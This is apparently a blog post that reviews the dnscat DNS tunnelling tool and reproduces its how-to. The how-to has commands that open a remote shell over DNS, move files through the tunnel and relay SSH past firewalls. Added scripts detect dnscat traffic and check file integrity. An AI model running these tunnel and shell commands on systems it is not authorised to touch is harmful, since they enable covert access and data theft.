Using dnscat: overall the tool feels unpolished with a high failure rate, file transfers have no integrity check, and in my own test forwarding through a domain name failed, possibly because its signature is too obvious
2017-12-14 17:58
git clone https://github.com/iagox86/nbtool
make
Then you can follow the official instructions below.
My take: overall the tool feels unpolished and fails often; file transfers have no integrity check; in my own test, forwarding through a domain name failed, possibly because its signature is too obvious (the subdomain contains the keyword dnscat).
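The remark above about the tunnel being easy to spot can be turned into a quick detection check. The following shell/awk script is an added example and is not part of nbtool or of the original post: it scans DNS query log lines and flags a query whose name contains a label equal to "dnscat" (the pattern the author observed) or a long hex-only label, a generic heuristic for data-carrying tunnel labels that is an assumption of this example rather than a documented dnscat property. The log format and the sample lines are constructed for the demo.

```shell
#!/bin/sh
# Added example: flag DNS queries that look like dnscat (v1 / nbtool) tunnel
# traffic. The log line format "... q=<name> ..." is this example's own
# assumption; adapt the field extraction to your resolver's log format.

# Constructed sample resolver log (not captured from a real dnscat session).
SAMPLE_DNS_LOG='2017-12-14T17:58:01 client=10.0.0.5 q=www.example.com type=A
2017-12-14T17:58:02 client=10.0.0.5 q=dnscat.0a1b.0001.48656c6c6f20776f726c64.skullseclabs.org type=TXT
2017-12-14T17:58:03 client=10.0.0.7 q=mail.example.com type=MX
2017-12-14T17:58:04 client=10.0.0.9 q=3f9a0c7b1d2e4f6a8b9c0d1e2f3a4b5c6d7e8f90.tunnel.example.net type=A'

# Reads log lines on stdin, prints "<reason> <query name>" for each suspicious
# query. Reasons: "keyword" (a label is exactly "dnscat", which wins over any
# other signal) or "hexlabel" (a label of 32+ hex characters, a heuristic for
# encoded payload chunks in any DNS tunnel, not just dnscat).
flag_dns_tunnel() {
    awk '
    {
        q = ""
        for (i = 1; i <= NF; i++) if ($i ~ /^q=/) q = substr($i, 3)
        if (q == "") next
        n = split(q, lab, ".")
        hit = ""
        for (i = 1; i <= n; i++) {
            if (tolower(lab[i]) == "dnscat")
                hit = "keyword"
            else if (hit == "" && length(lab[i]) >= 32 && lab[i] ~ /^[0-9a-fA-F]+$/)
                hit = "hexlabel"
        }
        if (hit != "") printf "%s %s\n", hit, q
    }'
}

# Offline demo over the constructed log: two of the four lines are flagged.
printf '%s\n' "$SAMPLE_DNS_LOG" | flag_dns_tunnel
```

The keyword rule is the cheap, high-confidence signal; the hex-label rule catches tunnels that do not announce themselves but will also fire on legitimate long hex labels (some CDN and anti-spam lookups), so treat it as a lead to correlate with query volume per client, not as an alert on its own.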
How-to
If you're going to read one section, this is probably the best one. It'll answer the question, "what the heck do I do with dnscat?"
Starting a server
You can start a dnscat server that supports a single client by running:
dnscat --listen
Adding --multi enables a dnscat server to handle multiple simultaneous clients:
dnscat --listen --multi
While --multi is obviously more functional, it is also slightly more difficult to use and doesn't take as kindly to redirection (it takes a little bit of shell magic to make it useful; I don't recommend it). Every client that connects picks a unique session id, which is displayed before every message. To send messages to specific sessions, the outgoing messages also have to be prefixed with the session id. So, sessions look like this (the '(in)' and '(out)' are added for clarification):
(in)  session1: This is some incoming data for the first session
(out) session2: This is outgoing data on second session
(in)  session2: This is a response on the second connection
And so on. When --multi isn't being used, redirection can be used to read/write files, create relays, and so on, the same way netcat can.
Starting a client
Once a server is running, a client can connect to it. This can be done in one of two ways.
First, and the usage I recommend: if the server is an authority for a domain name, you can use the --domain argument to provide the domain. Requests will be sent to the local dns server and will eventually be routed, through the DNS hierarchy, to the server. This is the best way to use dnscat, because it is very unlikely to be prevented. For more information, see the outline of Recursive Dns, above.
The second method is to send the dns messages directly from the client to the server using the --dns argument to specify the dnscat server address. This is useful for testing, and can fool simple packet captures and poorly conceived firewall rules, but isn't an ideal usage of dnscat.
By default, a random session id will be generated. If you run the dnscat server in --multi mode, you will likely want to use the --session argument on the client to give the sessions a more friendly name. No two sessions can share an id, though, and all names must be dns-friendly characters (letters and numbers).
To summarize, here are the two options for starting a client.
dnscat --domain skullseclabs.org
or
dnscat --dns 1.2.3.4
Where 'skullseclabs.org' is the domain that the dnscat server is the authority for, or '1.2.3.4' is the ip address of the dnscat server.
Examples
Simple server
As discussed above, a dnscat server can be started using the --listen argument:
dnscat --listen
Or, if multiple clients will connect, --multi can be given:
dnscat --listen --multi
Simple client
To start a dnscat client with an authoritative domain, use the following command:
dnscat --domain <domain>
For example:
dnscat --domain skullseclabs.org
And to start it without an authoritative domain, use this:
dnscat --dns <dnscat_server_address>
For example:
dnscat --dns 1.2.3.4
For more options, use --help:
dnscat --help
Remote shell
Typically, to tunnel a shell over DNS, you're going to want to run a standard server as before:
dnscat --listen
And run the shell on the client side:
Linux/BSD:
dnscat --domain skullseclabs.org --exec "/bin/sh"
Windows:
dnscat.exe --domain skullseclabs.org --exec "cmd.exe"
On the server, you can now type commands and they'll run on the client side.
Transfer a file
You can transfer a file from the client to the server like this:
Server: dnscat --listen > file.out
Client: dnscat --domain <domain> < file.in
You can change the direction that the file goes by switching around the redirects. To transfer from the server to the client, do this:
Server: dnscat --listen < file.in
Client: dnscat --domain <domain> > file.out
A couple things to note:
No integrity checking is performed
There is currently no indication when a transfer is finished
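Both limitations can be worked around outside dnscat by framing the file before it enters the tunnel. The shell script below is an added example, not code from nbtool or from the original post: the sender prefixes the payload with its byte length and SHA-256 digest, and the receiver reads exactly that many bytes and checks the digest, so it knows when the transfer is finished and whether the bytes arrived intact. The header format ("DNSCAT-FILE <length> <sha256>") and the function names are this example's own; in the demo a plain pipe stands in for the DNS tunnel, with dnscat's stdin/stdout redirection substituted as shown in the comments.

```shell
#!/bin/sh
# Added example: length + SHA-256 framing around a dnscat file transfer.
# The framing format and helpers are this example's own, not part of dnscat.

# SHA-256 of stdin as hex; falls back to shasum where sha256sum is absent.
sha256_hex() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum | cut -d' ' -f1
    else
        shasum -a 256 | cut -d' ' -f1
    fi
}

# Sender: emit "DNSCAT-FILE <length> <sha256>\n" followed by the raw bytes.
# With dnscat (client -> server direction from the text above):
#   send_framed file.in | dnscat --domain <domain>
send_framed() {
    f=$1
    len=$(wc -c < "$f" | tr -d ' ')
    sum=$(sha256_hex < "$f")
    printf 'DNSCAT-FILE %s %s\n' "$len" "$sum"
    cat "$f"
}

# Receiver: parse the header, read exactly <length> bytes, verify the digest.
# Return codes: 0 verified, 2 bad header, 3 truncated, 4 digest mismatch.
# With dnscat:
#   dnscat --listen | recv_framed file.out
recv_framed() {
    out=$1
    IFS=' ' read -r magic len sum || return 2
    [ "$magic" = "DNSCAT-FILE" ] || return 2
    head -c "$len" > "$out"
    got=$(wc -c < "$out" | tr -d ' ')
    [ "$got" = "$len" ] || return 3
    [ "$(sha256_hex < "$out")" = "$sum" ] || return 4
    return 0
}

# Offline demo: a pipe stands in for the DNS tunnel. Three cases are shown:
# a clean transfer, a payload byte altered in flight, and a truncated stream
# (the header is 80 bytes, so head -c 85 delivers only 5 of the 13 payload bytes).
demo() {
    d=$(mktemp -d)
    printf 'hello dnscat\n' > "$d/in"          # constructed sample payload
    send_framed "$d/in" | recv_framed "$d/ok";                          echo "clean:     rc=$?"
    send_framed "$d/in" | sed '2s/hello/jello/' | recv_framed "$d/bad"; echo "corrupted: rc=$?"
    send_framed "$d/in" | head -c 85 | recv_framed "$d/short";          echo "truncated: rc=$?"
    rm -rf "$d"
}
demo
```

The digest only detects accidental corruption or truncation; an on-path party who can rewrite the tunnel can rewrite the header too, so if that matters, sign or encrypt the payload (for example with gpg) before framing it rather than relying on a bare hash.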
Tunnel another connection
This is my favourite thing to do, and it works really slick. You can use netcat to open a port-to-port tunnel through dnscat. I like this enough that I'm going to add netcat-like arguments in the next version.
Let's say that the client can connect to an ssh server on 192.168.2.100. The server is on an entirely different network and normally has no access to 192.168.2.100. The whole situation is a little confusing because we want the dnscat client to connect to the ssh server (presumably, in real life, we'd be able to get a dnscat client on a target network, but not a dnscat server). "client" and "server" are such ancient terms anyways. I prefer to look at them as the sender and the receiver.
A diagram might help:
ssh client
    |
    | (port 1234 via netcat)
    |
    v
dnscat server
    ^
    |
    | (DNS server(s))
    |
dnscat client
    |
    | (port 22 via netcat)
    |
    v
ssh server
It's like a good ol' fashioned double netcat relay. Ed Skoudis would be proud. :)
First, we start the netcat server. The server is going to run netcat, which listens on port 1234:
dnscat --listen --exec "nc -l -p 1234"
If you connect to that host on port 1234, all data will be forwarded across DNS to the dnscat client.
Second, on the client side, dnscat connects to 192.168.2.100 port 22:
dnscat --domain skullseclabs.org --exec "nc 192.168.2.100 22"
This connects to 192.168.2.100 on port 22. The input/output will both be sent across DNS back to the dnscat server, which will then send the traffic to whomever is connected on TCP/1234.
Third and finally, we ssh to our socket:
ssh -p 1234 ron@127.0.0.1
Alternatively, if available, you can use ssh's -o ProxyCommand option, which has ssh spawn dnscat directly and talk to it over stdin/stdout, so no netcat listener on port 1234 is needed. Note that this reverses the roles in the diagram above: the host running ssh now runs the dnscat client, so the far end (the dnscat server) has to be the side that reaches the ssh server.
ssh -o ProxyCommand="./dnscat --domain skullseclabs.org" root@localhost
One thing to note: at the moment, doing this is slooooow. But it works, and it's really, really cool!